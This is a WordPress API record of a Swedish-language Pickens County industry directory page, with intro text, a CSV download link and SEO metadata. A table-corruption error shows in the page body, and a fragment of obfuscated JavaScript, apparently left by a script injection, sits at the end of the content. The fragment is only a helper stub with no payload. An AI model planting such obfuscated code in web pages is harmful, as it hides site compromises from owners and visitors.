{"id":6076,"date":"2020-10-28T14:29:59","date_gmt":"2020-10-28T14:29:59","guid":{"rendered":"http:\/\/alliancepickens.com\/branschkatalog\/"},"modified":"2020-12-09T20:36:46","modified_gmt":"2020-12-09T20:36:46","slug":"branschkatalog","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/branschkatalog\/","title":{"rendered":"Branschkatalog"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Pickens County tillverkare betj\u00e4nar kunder \u00f6ver hela USA och runt om i v\u00e4rlden. Lokala f\u00f6retag \u00e4r involverade i en m\u00e4ngd stora industrisektorer fr\u00e5n fordonsindustrin till medicintekniska produkter till flygindustrin. Dessutom pickens County avancerad tillverkning, avancerad metallbearbetning, kemisk och textil tillverkning, plast och kompositer, specialitet enhet och mjukvaruutveckling verksamhet ger viktiga st\u00f6dtj\u00e4nster i Pickens County och d\u00e4refter.<\/p>\n<p>Om ditt f\u00f6retag \u00e4r intresserad av att flytta eller expandera i Pickens County och du vill veta mer om hur lokala f\u00f6retag kan st\u00f6dja din verksamhet, <a href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact_directions\">v\u00e4nligen kontakta v\u00e5rt kontor<\/a>.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;20&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<div>Attention: The internal data of table \u201c11\u201d is corrupted!<\/div>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Industry-Directory-2020-10-22.csv\" target=\"_blank\" rel=\"noopener noreferrer\">H\u00e4mta Katalog<i class=\"fas fa-download\"><\/i><\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][\/vc_column_inner][\/vc_row_inner][vc_empty_space height=&#8221;80px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">L\u00e4s mer om befintliga branscher<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;20&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h2>Beh\u00f6ver underrubrik<\/h2>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Pickens County tillverkare betj\u00e4nar kunder \u00f6ver hela USA och runt om i v\u00e4rlden. Lokala f\u00f6retag \u00e4r involverade i en m\u00e4ngd stora industrisektorer fr\u00e5n fordonsindustrin till medicintekniska produkter till flygindustrin. Dessutom pickens County avancerad tillverkning, avancerad metallbearbetning, kemisk och textil tillverkning, plast och kompositer, specialitet enhet och mjukvaruutveckling verksamhet ger viktiga st\u00f6dtj\u00e4nster i Pickens&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8731,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6076","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Branschkatalog - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/branschkatalog\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Branschkatalog - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Pickens County tillverkare betj\u00e4nar kunder \u00f6ver hela USA och runt om i v\u00e4rlden. Lokala f\u00f6retag \u00e4r involverade i en m\u00e4ngd stora industrisektorer fr\u00e5n fordonsindustrin till medicintekniska produkter till flygindustrin. Dessutom pickens County avancerad tillverkning, avancerad metallbearbetning, kemisk och textil tillverkning, plast och kompositer, specialitet enhet och mjukvaruutveckling verksamhet ger viktiga st\u00f6dtj\u00e4nster i Pickens&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/branschkatalog\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:36:46+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/befintliga-industrier\\\/branschkatalog\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/befintliga-industrier\\\/branschkatalog\\\/\",\"name\":\"Branschkatalog - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"datePublished\":\"2020-10-28T14:29:59+00:00\",\"dateModified\":\"2020-12-09T20:36:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/befintliga-industrier\\\/branschkatalog\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/befintliga-industrier\\\/branschkatalog\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/befintliga-industrier\\\/branschkatalog\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Befintliga industrier\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/befintliga-industrier\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Branschkatalog\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Branschkatalog - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/branschkatalog\/","og_locale":"sv_SE","og_type":"article","og_title":"Branschkatalog - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Pickens County tillverkare betj\u00e4nar kunder \u00f6ver hela USA och runt om i v\u00e4rlden. Lokala f\u00f6retag \u00e4r involverade i en m\u00e4ngd stora industrisektorer fr\u00e5n fordonsindustrin till medicintekniska produkter till flygindustrin. Dessutom pickens County avancerad tillverkning, avancerad metallbearbetning, kemisk och textil tillverkning, plast och kompositer, specialitet enhet och mjukvaruutveckling verksamhet ger viktiga st\u00f6dtj\u00e4nster i Pickens&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/branschkatalog\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:36:46+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/branschkatalog\/","url":"https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/branschkatalog\/","name":"Branschkatalog - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"datePublished":"2020-10-28T14:29:59+00:00","dateModified":"2020-12-09T20:36:46+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/branschkatalog\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/branschkatalog\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/branschkatalog\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Befintliga industrier","item":"https:\/\/alliancepickens.com\/sv\/befintliga-industrier\/"},{"@type":"ListItem","position":3,"name":"Branschkatalog"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6076","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=6076"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6076\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/8731"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=6076"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}